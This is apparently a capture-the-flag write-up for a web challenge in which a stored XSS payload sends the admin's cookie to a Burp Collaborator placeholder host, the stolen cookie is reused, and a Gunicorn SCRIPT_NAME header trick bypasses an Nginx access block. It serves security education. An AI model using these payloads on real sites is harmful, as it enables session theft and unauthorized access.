.png)
2 days ago
14 BOOK THIS SPACE FOR AD
ARTICLE AD
Category: Web | Points: 300
This challenge is part of the CTF organized by Amazon x WiCyS 2024. Let’s dive in and unravel the secrets of Grayboard!
Your mission: To finish that boring web design homework and absolutely not break anything in the process. Yeah, right.
1. The Setup:
First things first, register for an account. Your professor will appreciate the effort.
2. A Curious Endpoint:
After logging in, we’ll snoop around to see if anything interesting pops up in the code. While checking the source code like a detective with too much caffeine, you’ll spot an endpoint /internal.
“Oh, what’s this secret door?!” you wonder. But, of course, when you try to access it, the server goes all gatekeeper on you:
“403 Forbidden. Admins Only.”
Fine, fine. Let’s find a way to steal — I mean, borrow — admin cookies.
3. Hints Don’t Lie!!!
The challenge hint :
“Remember, you can submit assignments!”
Oh, the irony. Submitting a harmless homework assignment to destroy this very system? Game on.
4. Testing for XSS:
Let’s sprinkle in a little Cross-Site Scripting (XSS) magic. Submit the following payload:
<img src=x onerror=alert(`alchemistwashere`)>
After submission, view it.
Pop! A cute little alert box shows up, confirming the XSS. The server is officially our playground now :)
5. Exploiting XSS:
Time to get serious. We’ll craft a payload to snag admin cookies:
<script>fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>
Replace BURP-COLLABORATOR-SUBDOMAIN with your Burp Collaborator link (a nifty feature of Burp Suite Pro).
Submit this payload, and voila! A hit appears in your Collaborator poll interface with the admin cookie :)
eyJpZCI6MSwidHlwZSI6ImFkbWluIiwidXNlcm5hbWUiOiJhZG1pbiJ9.ZzbmRA.O6NV1ZwjPcerI1T4FjDeayIihwgVerify it using a JWT decoder like jwt.io.
The cookie checks out and belongs to the admin. 🎯
6. Become the Admin:
Now, let’s flex our newfound admin power. Install the browser extension Cookie Editor (your new best friend) and replace your current cookie with the stolen admin cookie.
Boom! You’re the admin now.
7. The Forbidden Fruit (/internal)
Let’s get to the /internalendpoint … it follows to /internal/submissions but…
403 Forbidden?!
“What do you mean I can’t enter after all this effort?!” Deep breaths. Let’s figure this out.
8. The Final Twist
After scouring the internet (and drowning in frustration), you notice something important:
The server is running Gunicorn, with Nginx as a reverse proxy.Google takes you to a fascinating Gunicorn issue.Gunicorn can be tricked via HTTP headers like SCRIPT_NAME into bypassing Nginx’s access controls. Let’s exploit this misconfiguration.
9. Crafting the Request
Using a tool like Burp Suite, modify your HTTP request to include:
GET /test/internal/internal/submissionsHeader:
Script_name: /internal
Here’s what’s happening:
When the SCRIPT_NAMEheader is set to /internal, Gunicorn treats the path as starting from /internal. This causes the request path /test/internal/internal/submissions to be forwarded as /internal/submissions, bypassing the 403 restrictions enforced by the proxy (Nginx) and allowing access to the restricted endpoint.
The stars align, and the server finally coughs up the flag:
Flag{why_yes_i_am_valedictorian_but_dont_ask_how}
Turns out, even web design homework has a dark side. Who knew? 😉
Special thanks to the organizers, Amazon and WiCyS, for creating such an enjoyable and thought-provoking challenge!
And if you’ve stuck with me all the way to the end — thank you so much for reading!😄 I’d love to hear your feedback on this, so don’t hesitate to connect with me on LinkedIn (Nehal Pillai) and Twitter (@nehal_10_0) — Let’s keep the cybersecurity convo going!
Cheers 🍻 and until next time….
Bengali (Bangladesh) · 
English (United States) ·